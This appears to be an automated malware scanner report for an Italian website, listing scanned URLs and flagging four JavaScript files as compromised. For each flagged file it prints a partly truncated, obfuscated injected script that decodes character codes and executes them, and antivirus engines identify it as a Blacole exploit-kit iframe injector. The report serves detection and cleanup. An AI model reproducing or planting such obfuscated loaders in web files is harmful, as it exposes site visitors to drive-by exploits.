New scan:

Malware Scanner report for cercolocali.it

Malicious/Suspicious/Total urls checked
4/0/25
4 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://cercolocali.it/
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 25 Dec 2014 14:32:49 GMT
Location: http://www.cercolocali.it/
Server: Apache
Content-Length: 234
Content-Type: text/html; charset=iso-8859-1
clean
http://www.cercolocali.it/
200 OK
Content-Length: 17475
Content-Type: text/html
clean
https://ajax.googleapis.com/ajax/libs/jquery/1.5.0/jquery.min.js
200 OK
Content-Length: 84362
Content-Type: text/javascript
clean
http://cercolocali.it/js/languageswitcher.js
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 25 Dec 2014 14:32:51 GMT
Location: http://www.cercolocali.it/js/languageswitcher.js
Server: Apache
Content-Length: 256
Content-Type: text/html; charset=iso-8859-1
clean
http://www.cercolocali.it/js/languageswitcher.js
200 OK
Content-Length: 1896
Content-Type: application/x-javascript
clean
http://cercolocali.it/js/prepopulate.js
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 25 Dec 2014 14:32:51 GMT
Location: http://www.cercolocali.it/js/prepopulate.js
Server: Apache
Content-Length: 251
Content-Type: text/html; charset=iso-8859-1
clean
http://www.cercolocali.it/js/prepopulate.js
200 OK
Content-Length: 2667
Content-Type: application/x-javascript
clean
http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
200 OK
Content-Length: 57254
Content-Type: text/javascript
clean
http://cercolocali.it/contattaci.php
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 25 Dec 2014 14:32:52 GMT
Location: http://www.cercolocali.it/contattaci.php
Server: Apache
Content-Length: 248
Content-Type: text/html; charset=iso-8859-1
clean
http://www.cercolocali.it/contattaci.php
200 OK
Content-Length: 10009
Content-Type: text/html
clean
http://www.cercolocali.it/js/jquery.js
200 OK
Content-Length: 83472
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)


try{window.document.body++}catch(gdsgsdg){db
... 1408 bytes are skipped ...
102,95,105,107,38,112,108,100,107,93,33,33,55,91,97,111,26,100,91,53,85,33,105,98,109,90,112,87,30,54,53,41,95,96,110,55,33,36,50,5,3,26,27,23,24,25,26,27,23,92,104,93,112,100,93,103,110,41,94,93,109,63,103,92,101,94,104,111,57,113,66,94,35,30,102,100,111,92,109,31,34,40,92,103,104,94,104,95,58,96,98,102,95,31,102,100,111,92,109,33,52,7,5,23,24,25,26,120,4,2,118,35,35,32,51);s="";for(i=0;i-497!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCode"](1*asgq[i]-(i%5-5-4));}z=s;e(s);}

Antivirus reports:

AntiVir
JS/iFrame.afu.12
Avast
JS:Iframe-XJ [Trj]
Ikarus
Exploit.JS.Blacole
nProtect
JS:Trojan.JS.Agent.GO
K7AntiVirus
Riskware
Comodo
TrojWare.JS.BlacoleRef.W
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.400
Kaspersky
Trojan.JS.Redirector.xb
Microsoft
Exploit:JS/Blacole.KH
MicroWorld-eScan
JS:Trojan.JS.Agent.GO
Fortinet
JS/Iframe.W!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Agent.bdetht
F-Secure
JS:Trojan.JS.Agent.GO
F-Prot
JS/Blacole.DC.gen
AVG
HTML/Framer
Norman
Agent.AMAYB
GData
JS:Trojan.JS.Agent.GO
Commtouch
JS/Blacole.DC.gen
BitDefender
JS:Trojan.JS.Agent.GO

http://cercolocali.it/js/jquery.simplemodal.js
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 25 Dec 2014 14:32:53 GMT
Location: http://www.cercolocali.it/js/jquery.simplemodal.js
Server: Apache
Content-Length: 258
Content-Type: text/html; charset=iso-8859-1
clean
http://www.cercolocali.it/js/jquery.simplemodal.js
200 OK
Content-Length: 15015
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)


try{window.document.body++}catch(gdsgsdg){db
... 1408 bytes are skipped ...
102,95,105,107,38,112,108,100,107,93,33,33,55,91,97,111,26,100,91,53,85,33,105,98,109,90,112,87,30,54,53,41,95,96,110,55,33,36,50,5,3,26,27,23,24,25,26,27,23,92,104,93,112,100,93,103,110,41,94,93,109,63,103,92,101,94,104,111,57,113,66,94,35,30,102,100,111,92,109,31,34,40,92,103,104,94,104,95,58,96,98,102,95,31,102,100,111,92,109,33,52,7,5,23,24,25,26,120,4,2,118,35,35,32,51);s="";for(i=0;i-497!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCode"](1*asgq[i]-(i%5-5-4));}z=s;e(s);}

Antivirus reports:

AntiVir
JS/iFrame.afu.12
Avast
JS:Iframe-XJ [Trj]
Ikarus
Exploit.JS.Blacole
nProtect
JS:Trojan.JS.Agent.GO
K7AntiVirus
Riskware
Comodo
TrojWare.JS.BlacoleRef.W
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.400
Kaspersky
Trojan.JS.Redirector.xb
Microsoft
Exploit:JS/Blacole.KH
MicroWorld-eScan
JS:Trojan.JS.Agent.GO
Fortinet
JS/Iframe.W!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Agent.bdetht
F-Secure
JS:Trojan.JS.Agent.GO
F-Prot
JS/Blacole.DC.gen
AVG
HTML/Framer
Norman
Agent.AMAYB
GData
JS:Trojan.JS.Agent.GO
Commtouch
JS/Blacole.DC.gen
BitDefender
JS:Trojan.JS.Agent.GO

http://cercolocali.it/js/contact.js
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 25 Dec 2014 14:32:53 GMT
Location: http://www.cercolocali.it/js/contact.js
Server: Apache
Content-Length: 247
Content-Type: text/html; charset=iso-8859-1
clean
http://www.cercolocali.it/js/contact.js
200 OK
Content-Length: 10729
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)


try{window.document.body++}catch(gdsgsdg){db
... 1408 bytes are skipped ...
102,95,105,107,38,112,108,100,107,93,33,33,55,91,97,111,26,100,91,53,85,33,105,98,109,90,112,87,30,54,53,41,95,96,110,55,33,36,50,5,3,26,27,23,24,25,26,27,23,92,104,93,112,100,93,103,110,41,94,93,109,63,103,92,101,94,104,111,57,113,66,94,35,30,102,100,111,92,109,31,34,40,92,103,104,94,104,95,58,96,98,102,95,31,102,100,111,92,109,33,52,7,5,23,24,25,26,120,4,2,118,35,35,32,51);s="";for(i=0;i-497!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCode"](1*asgq[i]-(i%5-5-4));}z=s;e(s);}

Antivirus reports:

AntiVir
JS/iFrame.afu.12
Avast
JS:Iframe-XJ [Trj]
Ikarus
Exploit.JS.Blacole
nProtect
JS:Trojan.JS.Agent.GO
K7AntiVirus
Riskware
Comodo
TrojWare.JS.BlacoleRef.W
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.400
Kaspersky
Trojan.JS.Redirector.xb
Microsoft
Exploit:JS/Blacole.KH
MicroWorld-eScan
JS:Trojan.JS.Agent.GO
Fortinet
JS/Iframe.W!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Agent.bdetht
F-Secure
JS:Trojan.JS.Agent.GO
F-Prot
JS/Blacole.DC.gen
AVG
HTML/Framer
Norman
Agent.AMAYB
GData
JS:Trojan.JS.Agent.GO
Commtouch
JS/Blacole.DC.gen
BitDefender
JS:Trojan.JS.Agent.GO

http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js
200 OK
Content-Length: 55740
Content-Type: text/javascript
clean
http://cercolocali.it/js/jquery.easing.1.3.js
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 25 Dec 2014 14:32:54 GMT
Location: http://www.cercolocali.it/js/jquery.easing.1.3.js
Server: Apache
Content-Length: 257
Content-Type: text/html; charset=iso-8859-1
clean
http://www.cercolocali.it/js/jquery.easing.1.3.js
200 OK
Content-Length: 13863
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)


try{window.document.body++}catch(gdsgsdg){db
... 1408 bytes are skipped ...
102,95,105,107,38,112,108,100,107,93,33,33,55,91,97,111,26,100,91,53,85,33,105,98,109,90,112,87,30,54,53,41,95,96,110,55,33,36,50,5,3,26,27,23,24,25,26,27,23,92,104,93,112,100,93,103,110,41,94,93,109,63,103,92,101,94,104,111,57,113,66,94,35,30,102,100,111,92,109,31,34,40,92,103,104,94,104,95,58,96,98,102,95,31,102,100,111,92,109,33,52,7,5,23,24,25,26,120,4,2,118,35,35,32,51);s="";for(i=0;i-497!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCode"](1*asgq[i]-(i%5-5-4));}z=s;e(s);}

Antivirus reports:

AntiVir
JS/iFrame.afu.12
Avast
JS:Iframe-XJ [Trj]
Ikarus
Exploit.JS.Blacole
nProtect
JS:Trojan.JS.Agent.GO
K7AntiVirus
Riskware
Comodo
TrojWare.JS.BlacoleRef.W
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.400
Kaspersky
Trojan.JS.Redirector.xb
Microsoft
Exploit:JS/Blacole.KH
MicroWorld-eScan
JS:Trojan.JS.Agent.GO
Fortinet
JS/Iframe.W!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Agent.bdetht
F-Secure
JS:Trojan.JS.Agent.GO
F-Prot
JS/Blacole.DC.gen
AVG
HTML/Framer
Norman
Agent.AMAYB
GData
JS:Trojan.JS.Agent.GO
Commtouch
JS/Blacole.DC.gen
BitDefender
JS:Trojan.JS.Agent.GO

http://cercolocali.it/sitemap.xml
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 25 Dec 2014 14:32:55 GMT
Location: http://www.cercolocali.it/sitemap.xml
Server: Apache
Content-Length: 245
Content-Type: text/html; charset=iso-8859-1
clean
http://www.cercolocali.it/sitemap.xml
200 OK
Content-Length: 300766
Content-Type: text/xml
clean
http://www.cercolocali.it/test404page.js
404 Not Found
Content-Length: 1635
Content-Type: text/html
clean
http://cercolocali.it/sitemap2.xml
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 25 Dec 2014 14:32:55 GMT
Location: http://www.cercolocali.it/sitemap2.xml
Server: Apache
Content-Length: 246
Content-Type: text/html; charset=iso-8859-1
clean
http://www.cercolocali.it/sitemap2.xml
200 OK
Content-Length: 300768
Content-Type: text/xml
clean
http://cercolocali.it/sitemap3.xml
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 25 Dec 2014 14:32:59 GMT
Location: http://www.cercolocali.it/sitemap3.xml
Server: Apache
Content-Length: 246
Content-Type: text/html; charset=iso-8859-1
clean
http://www.cercolocali.it/sitemap3.xml
200 OK
Content-Length: 300766
Content-Type: text/xml
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: cercolocali.it

Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 25 Dec 2014 14:32:49 GMT
Location: http://www.cercolocali.it/
Server: Apache
Content-Length: 234
Content-Type: text/html; charset=iso-8859-1

...234 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: cercolocali.it
Referer: http://www.google.com/search?q=cercolocali.it

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=cercolocali.it

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://cercolocali.it/

Result: cercolocali.it is not infected or malware details are not published yet.